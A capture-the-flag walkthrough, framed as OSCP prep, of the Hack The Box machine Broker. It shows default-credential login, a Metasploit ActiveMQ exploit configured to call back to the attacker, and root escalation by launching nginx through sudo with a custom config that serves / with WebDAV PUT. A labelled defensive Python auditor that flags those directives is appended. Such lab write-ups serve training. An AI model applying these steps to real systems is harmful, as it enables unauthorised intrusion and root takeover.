OSCP PREP BOX 3: HtB Broker

Key Takeaways:

  • Nginx runs with WebDAV enabled, and we can use weaknesses in the WebDAV setup to PUT files.

  • We can use the .conf files for web servers as templates for our own.

  • Don’t be in a rush. Take time to learn how the apps work, where they store information, etc. We won’t always come across services we already know, so we have to be willing to take the time to learn them.


Broker! This box was super tricky for the priv esc. The entry into the machine was actually quite easy through the Metasploit module; I was able to get user access within just a few minutes. The priv esc on this box took me about 5 hours of pain, and I did ultimately have to get some assistance from IppSec’s walkthrough. I kept having issues with the WebDAV PUT method to get RCE. As I’ll go through in the walkthrough, I was able to get file reads as root, but was struggling to get RCE as root.

Anyways, default nmap scan shows us this:

From the scan we can see we have a web server returning 401 Unauthorized on port 80, plus a few other services. I navigated to it and prepared myself to write a Basic Auth brute force (covered in the eWPT course), but instead I got in within seconds using admin:admin.

This took me to a basic web page with the title ACTIVEMQ.

I took to searchsploit and saw there was a deserialization attack and also a Metasploit module available.

I launched msfconsole, searched activemq, and selected the 2023 exploit.

From there, I made the following configurations:

set srvhost tun0
set lhost tun0
set rhosts <target IP>
set target 1
run

Now is where the real work begins. This is where I spent HOURS researching nginx configurations and more. I don’t have a ton of web dev experience, so for me this was exceedingly convoluted, but I ended up learning a lot.

I ran my usual enumeration, and sudo -l is always one of my first checks. Off the bat we get this:

So, I’ll summarize briefly what I learned. The nginx binary launches an nginx web server. If we pass it a .conf file, we can configure options for that web server. If we look at the nginx.conf file running on broker.htb, we can use it as a template for ours.

Okay, so there’s more to the .conf file, but it got cut off in the image. Just analyzing the top, we see that this configuration file runs http under the user www-data. Some of the files it includes are under the /etc/nginx/modules-enabled/ directory. So, what if we launched our own nginx http server running under the user root?

To help with that, we can borrow the formatting of the broker.htb site configuration. It’s located under /etc/nginx/sites-enabled/, and we can look at the HTTP server they have set up:

Now we can add that to our .conf file underneath the http section, listen on a different port, and make the root path the root of the file system, /.

Then we save it to a directory we control. I used /dev/shm/, and then we can run:

sudo nginx -c /dev/shm/nginx.conf

We can verify this .conf file is up and running a web server using:

ss -lntp

Now this gives us directory read over the whole file system. My initial retrieval of the flag was simply by using curl to query the web server we set up:
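A defender-side check for the pattern this box turns on, added here as an example that is not code from the original post or from the box: a small Python auditor that parses a flat nginx-style config and flags the directives a root-run config would abuse (a root worker user, a document root of /, directory listing, and WebDAV PUT/DELETE). The sample config is constructed for the demo and the directive list is my own assumption of what is worth flagging.

```python
import re

# Constructed sample config (not the box's), shaped like the one the post describes:
# a top-level user directive, an http block, and a server block rooted at /.
SAMPLE_CONF = """
user root;
worker_processes auto;
events { worker_connections 1024; }
http {
    server {
        listen 1337;        # non-standard port so it does not clash with :80
        root /;             # whole file system served as the document root
        autoindex on;       # directory listing, i.e. 'directory read' as root
        dav_methods PUT;    # WebDAV write into that root
    }
}
"""

# Directive values that make an nginx config dangerous when nginx runs as root.
# This list is an assumption for the demo, not an exhaustive policy.
RISKY = {
    "user": lambda v: v == "root",
    "root": lambda v: v == "/",
    "autoindex": lambda v: v == "on",
    "dav_methods": lambda v: bool({"PUT", "DELETE"} & set(v.split())),
}


def parse_directives(conf):
    """Return (name, value) pairs for simple 'name value;' directives.

    Braces and '#' comments are ignored; nesting is deliberately flattened,
    which is enough to spot the directives the audit cares about.
    """
    pairs = []
    for line in conf.splitlines():
        line = line.split("#", 1)[0]
        for m in re.finditer(r"([A-Za-z_]+)\s+([^;{}]+);", line):
            pairs.append((m.group(1), m.group(2).strip()))
    return pairs


def audit_nginx_conf(conf):
    """Return findings such as 'user root' for every risky directive value."""
    findings = []
    for name, value in parse_directives(conf):
        check = RISKY.get(name)
        if check and check(value):
            findings.append(f"{name} {value}")
    return findings
```

Run it against any config a sudo rule lets an unprivileged user hand to nginx; a clean config yields an empty list, and any finding is worth a ticket before the rule is.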
